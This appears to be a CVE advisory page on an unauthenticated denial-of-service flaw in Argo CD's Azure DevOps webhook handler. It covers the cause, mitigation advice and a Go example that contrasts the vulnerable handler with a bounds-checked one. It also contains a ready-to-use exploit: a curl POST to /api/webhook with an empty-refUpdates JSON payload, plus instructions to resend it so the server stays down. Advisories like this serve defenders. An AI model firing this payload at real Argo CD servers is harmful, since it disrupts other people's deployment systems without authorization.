How the CVE Works
The vulnerability exists in the code that handles Azure DevOps webhook push events in Argo CD. When a `git.push` event is received, the handler decodes the JSON payload and reads the first element of the `resource.refUpdates` array without first checking that the array is non-empty. Specifically, it accesses `payload.Resource.RefUpdates[0]` to extract the revision and the before/after commit IDs. If an attacker sends a webhook payload containing an empty `"refUpdates": []` array, this access causes an index-out-of-range runtime panic in the Go code. Go's `net/http` server recovers a panic raised directly inside a request handler, so the fact that the whole process dies means the panic happens in a goroutine the handler starts for event processing, where nothing recovers it; the Go runtime then terminates the entire `argocd-server` process. The result is a complete denial of service that any client able to reach `/api/webhook` can trigger without authentication.
<h2 style="color: blue;">DailyCVE Form</h2>
Platform: Argo CD
Version: < v2.6.5
Vulnerability: DoS
Severity: Critical
<h2 style="color: blue;">date: 2023-01-24</h2>
<h2 style="color: blue;">Prediction: Patch 2023-01-31</h2>
<h2 style="color: blue;">What Undercode Say</h2>
Bash commands and code related to this post:
[bash]
curl -k -X POST https://argocd.example.com/api/webhook \
  -H 'X-Vss-ActivityId: 11111111-1111-1111-1111-111111111111' \
  -H 'Content-Type: application/json' \
  --data-binary @payload-azure-empty.json
// payload-azure-empty.json
{
  "eventType": "git.push",
  "resource": {
    "refUpdates": [],
    "repository": {
      "remoteUrl": "https://example.com/dummy",
      "defaultBranch": "refs/heads/master"
    }
  }
}
// Vulnerable code (util/webhook/webhook.go): RefUpdates[0] is read without a length check
revision = ParseRevision(payload.Resource.RefUpdates[0].Name)
change.shaAfter = ParseRevision(payload.Resource.RefUpdates[0].NewObjectID)
change.shaBefore = ParseRevision(payload.Resource.RefUpdates[0].OldObjectID)
How Exploit
Craft an Azure DevOps `git.push` webhook payload with an empty `refUpdates` array. Send it as an unauthenticated POST to `/api/webhook`, with the `X-Vss-ActivityId` header set so Argo CD routes the body to its Azure DevOps parser. The handler panics on `RefUpdates[0]` and the `argocd-server` process exits; resending the same request after a restart takes it down again.
Protection from this CVE
Upgrade Argo CD to a release that carries the fix (a length check on `refUpdates` before the first element is read). Until then, configure webhook secrets so that payloads from untrusted senders are rejected before they are parsed, and restrict network access to `/api/webhook` to the addresses your Azure DevOps instance sends from where that is possible.
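The unchecked access described under "How the CVE Works" and the bounds-checked form the patch amounts to, side by side, as an added Go example that is not Argo CD's own code. The payload structs, the `parseRevision` helper (which only strips `refs/heads/`) and the `Handle*` function names are assumptions made for the illustration; the two sample bodies are constructed, the first being the crash payload shown above. `HandleVulnerable` wraps the unpatched pattern in `recover` purely so the panic can be observed as a value; in the real server nothing recovers it, which is why the process dies.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
	"strings"
)

// Minimal model of the Azure DevOps git.push payload fields the webhook
// handler reads. JSON keys follow the payload shown on this page; the
// struct itself is an illustration, not Argo CD's own type.
type RefUpdate struct {
	Name        string `json:"name"`
	OldObjectID string `json:"oldObjectId"`
	NewObjectID string `json:"newObjectId"`
}

type Repository struct {
	RemoteURL     string `json:"remoteUrl"`
	DefaultBranch string `json:"defaultBranch"`
}

type GitPushPayload struct {
	EventType string `json:"eventType"`
	Resource  struct {
		RefUpdates []RefUpdate `json:"refUpdates"`
		Repository Repository  `json:"repository"`
	} `json:"resource"`
}

// ChangeInfo is the revision data extracted from refUpdates[0].
type ChangeInfo struct {
	Revision  string
	ShaBefore string
	ShaAfter  string
}

// parseRevision is a hypothetical stand-in for ParseRevision: "refs/heads/main" -> "main".
func parseRevision(ref string) string {
	return strings.TrimPrefix(ref, "refs/heads/")
}

// extractVulnerable reproduces the unpatched pattern: RefUpdates[0] is
// indexed without a length check, so "refUpdates": [] raises an
// index-out-of-range runtime panic.
func extractVulnerable(p *GitPushPayload) ChangeInfo {
	return ChangeInfo{
		Revision:  parseRevision(p.Resource.RefUpdates[0].Name),
		ShaAfter:  p.Resource.RefUpdates[0].NewObjectID,
		ShaBefore: p.Resource.RefUpdates[0].OldObjectID,
	}
}

// extractSafe is the bounds-checked form: an empty refUpdates is reported
// as an error and the event is dropped instead of crashing the process.
func extractSafe(p *GitPushPayload) (ChangeInfo, error) {
	if len(p.Resource.RefUpdates) == 0 {
		return ChangeInfo{}, errors.New("git.push event carries no refUpdates; ignoring")
	}
	ru := p.Resource.RefUpdates[0]
	return ChangeInfo{
		Revision:  parseRevision(ru.Name),
		ShaAfter:  ru.NewObjectID,
		ShaBefore: ru.OldObjectID,
	}, nil
}

// HandleVulnerable decodes a raw webhook body and runs the unpatched
// extraction. The recover() exists only so the panic can be observed as a
// value here; the real server has no such recovery.
func HandleVulnerable(body []byte) (info ChangeInfo, err error) {
	defer func() {
		if r := recover(); r != nil {
			err = fmt.Errorf("panic: %v", r)
		}
	}()
	var p GitPushPayload
	if uerr := json.Unmarshal(body, &p); uerr != nil {
		return ChangeInfo{}, uerr
	}
	return extractVulnerable(&p), nil
}

// HandleSafe is the patched equivalent: same decoding, bounds-checked extraction.
func HandleSafe(body []byte) (ChangeInfo, error) {
	var p GitPushPayload
	if err := json.Unmarshal(body, &p); err != nil {
		return ChangeInfo{}, err
	}
	if p.EventType != "git.push" {
		return ChangeInfo{}, fmt.Errorf("unsupported eventType %q", p.EventType)
	}
	return extractSafe(&p)
}

// Constructed sample bodies: the crash payload from this page and a normal push.
var EmptyRefUpdates = []byte(`{"eventType":"git.push","resource":{"refUpdates":[],"repository":{"remoteUrl":"https://example.com/dummy","defaultBranch":"refs/heads/master"}}}`)

var NormalPush = []byte(`{"eventType":"git.push","resource":{"refUpdates":[{"name":"refs/heads/main","oldObjectId":"aaaa","newObjectId":"bbbb"}],"repository":{"remoteUrl":"https://example.com/dummy","defaultBranch":"refs/heads/main"}}}`)

func main() {
	_, err := HandleVulnerable(EmptyRefUpdates)
	fmt.Println("unpatched handler on empty refUpdates:", err)
	_, err = HandleSafe(EmptyRefUpdates)
	fmt.Println("patched handler on empty refUpdates:", err)
	info, _ := HandleSafe(NormalPush)
	fmt.Printf("patched handler on a normal push: %+v\n", info)
}
```

Running it shows the unpatched path failing with `runtime error: index out of range [0] with length 0` on the crash payload while the patched path returns a plain error and carries on, and both paths produce the same `ChangeInfo` for a normal push, which is the whole of what the fix changes.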
Impact
Unauthenticated, repeatable crash of `argocd-server`: the API server and UI are unavailable until the process restarts, and an attacker who can reach the webhook endpoint can keep resending the payload to hold it down.
Sources:
Reported By: github.com

